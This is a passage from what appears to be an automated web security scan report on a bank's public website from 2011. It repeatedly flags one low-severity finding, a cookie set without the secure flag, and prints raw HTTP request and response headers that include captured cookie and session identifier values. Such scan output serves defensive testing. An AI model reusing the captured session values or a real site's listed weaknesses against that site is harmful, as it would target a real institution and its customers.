The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 25911
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /App_Themes/Default/img/arrowGray_Small.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /App_Themes/Default/img/arrowOrange.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /App_Themes/Default/img/bgDot.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /App_Themes/Default/img/logoEqualHousingLender.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /App_Themes/Default/screen.css HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; www.regions.com-ssl=R1752032910; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Contact.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/contact.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/contact.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /FAQ/insured_deposits.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/faq/insured_deposits.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 163
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/faq/insured_deposits.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /GoogleSearch.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 20239
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Locator.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 18903
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Rates.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 18775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about_regions.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 23754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about_regions/economic_update.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/about_regions/economic_update.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/about_regions/economic_update.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /commercial_banking.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 24850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.regions.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img/btnDownArrow.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img/btnRightArrow.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img/left.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 43 Content-Type: image/gif Last-Modified: Thu, 02 Oct 2008 15:28:14 GMT Accept-Ranges: bytes ETag: "0fb457ca324c91:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:19 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img/logoRegions_213x45.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 6788 Content-Type: image/gif Last-Modified: Tue, 26 May 2009 17:12:46 GMT Accept-Ranges: bytes ETag: "03b2a3025dec91:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:19 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/loadMedia.js HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; www.regions.com-ssl=R1752032910; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Type: application/x-javascript Last-Modified: Thu, 18 Mar 2010 14:18:12 GMT Accept-Ranges: bytes ETag: "0aa72d7a5c6ca1:7c0f" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:15 GMT Content-Length: 18069
...// (1) browser vendor: // is_nav, is_firefox, is_ie, is_opera, is_hotjava, is_webtv, is_TVNavigator, is_AOLTV // (2) browser version number: // is_major (integer indicating major version ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/wtbase.js HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Type: application/x-javascript Last-Modified: Thu, 06 Nov 2008 18:55:36 GMT Accept-Ranges: bytes ETag: "0c4bd404140c91:7c0f" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:17 GMT Content-Length: 13718
function DcsInit(){ this.dcsid="dcs4b71fc10000gs8u88h5t1k_6n2i"; this.domain="statse.webtrendslive.com"; this.enabled=true; this.exre=(function(){ if (window.RegExp){ return(new RegExp( ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 23526
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/alternative_education_loans.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/alternative_education_loans.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 187
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/alternative_education_loans.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/auto_loans.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/auto_loans.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 170
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/auto_loans.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/cds.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/cds.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 163
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/cds.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/checking.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/checking.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 168
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/checking.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/credit_cards.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/credit_cards.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/credit_cards.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/ehl.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/ehl.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 163
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/ehl.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
